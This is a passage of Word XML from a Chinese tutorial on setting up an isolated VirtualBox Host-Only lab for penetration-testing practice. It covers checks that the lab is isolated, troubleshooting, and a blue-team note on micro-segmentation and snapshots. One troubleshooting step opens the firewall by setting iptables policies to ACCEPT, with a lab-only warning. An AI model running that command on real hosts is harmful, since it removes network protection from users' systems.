        <w:t xml:space="preserve"># 在靶机上尝试 ping 一个公网 IP（如 8.8.8.8）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 这将通过靶机仅有的 Host-Only 网卡发出</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--- 8.8.8.8 ping statistics ---</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">3 packets transmitted, 0 received, 100% packet loss, time 2036ms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">100% packet loss</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是正确且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">必需</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的结果。Host-Only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络没有通往外界的网关，ICMP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求包在发出后，由于目标不可达而被丢弃。如果此步你收到了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">回复，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">说明你的靶机可能仍有另一块网卡连接到了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">或桥接网络</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。请立即关闭虚拟机，检查网络适配器配置，确保靶机仅连接</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">适配器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">验证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.3：宿主机的网络不受干扰</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在宿主机上，确认其正常的上网功能未受影响（例如浏览器能访问搜索引擎），且宿主机的局域网内其他设备均未出现与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.56.0/24</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">相关的异常通信。这确保了虚拟实验室是“宿主内部的一个密闭容器”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="40"/>
    <w:bookmarkStart w:id="41" w:name="常见错误与排错"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">常见错误与排错</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vboxmanage hostonlyif create</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">失败，提示权限不足或无法创建。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux：确认当前用户在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vboxusers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">组内（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo usermod -aG vboxusers $USER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并注销重新登录）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows：以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">管理员权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">运行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell/CMD。某些安全软件（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hyper-V </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">角色、某些杀毒软件的“内核隔离”功能）可能与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VirtualBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">驱动冲突，尝试暂时禁用相关软件排查②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">macOS：系统完整性保护（SIP）与第三方内核扩展（kext）的安装政策可能导致</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VirtualBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内核扩展被拦截。安装或升级</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VirtualBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后，应在“系统偏好设置”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> →</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“安全性与隐私”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中手动允许来自</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Oracle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的系统扩展。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vboxmanage hostonlyif ipconfig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报错</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“The host-only adapter does not exist or is not configured”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vboxmanage list hostonlyifs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">确认适配器名称。如果你在创建后未看到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vboxnet0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，可能是创建步骤失败。尝试重启</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VirtualBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">相关服务（甚至重启宿主机）后重试。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：虚拟机无法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络中的其他虚拟机，但网络适配器已正确配置。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在虚拟机内确认网卡是否已识别并获取了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP：执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ip addr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。若无</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP，可能是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">未生效或网卡未启动。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">确认虚拟机操作系统内的防火墙（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nftables</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防火墙）没有丢弃</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ICMP。可以通过临时禁用防火墙来排查问题：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo iptables -P INPUT ACCEPT; sudo iptables -P OUTPUT ACCEPT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（仅在隔离实验室中执行，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">切勿</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在生产系统中禁用防火墙②）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检查宿主机上的防火墙软件（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows Defender Firewall、Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）是否错误地阻拦了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">适配器的流量。可尝试在宿主机上针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vboxnet0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">接口临时放行所有流量来验证。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VirtualBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络设置中，找不到刚创建的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vboxnet0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">适配器。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：关闭并重新打开</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VirtualBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主窗口，刷新网络适配器列表。如果问题依旧，参考第一条错误中关于权限和驱动冲突的处理方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御/卫生对照框：最小爆炸半径与快照安全网</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队检测视角</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：你搭建的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隔离环境本身即是一种防御策略的体现——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“网络微分段”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Micro-segmentation）。在企业环境中，蓝队将关键资产置于严格隔离的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或微分段域中，使其与普通办公网络、DMZ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">区域甚至公网之间没有路由可达。这种架构可显著缩小攻击者在成功入侵单台主机后能够横向移动的范围。你可以用实验来验证：即使在靶机中植入了连接公网</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器的恶意软件，由于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络没有出向互联网路径，该恶意软件的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> beacon </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">也将永远无法到达目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">C2，其活动被强制限制在可控环境中。这即是“阻滞入侵扩散”的核心思想，与零信任架构中的“默认拒绝”网络策略一脉相承。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">修复与恢复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在开始任何攻击性操作（尤其是可能破坏靶机操作系统内核、文件系统、注册表的重型利用）之前，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">必须</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为靶机和攻击机拍摄虚拟机快照（Snapshot）。快照就像是时间的“存档点”——一旦操作导致系统崩溃、配置混乱或被恶意软件污染，你可以通过一次点击将系统完美还原到拍摄快照时的状态，无需重新导入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OVA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
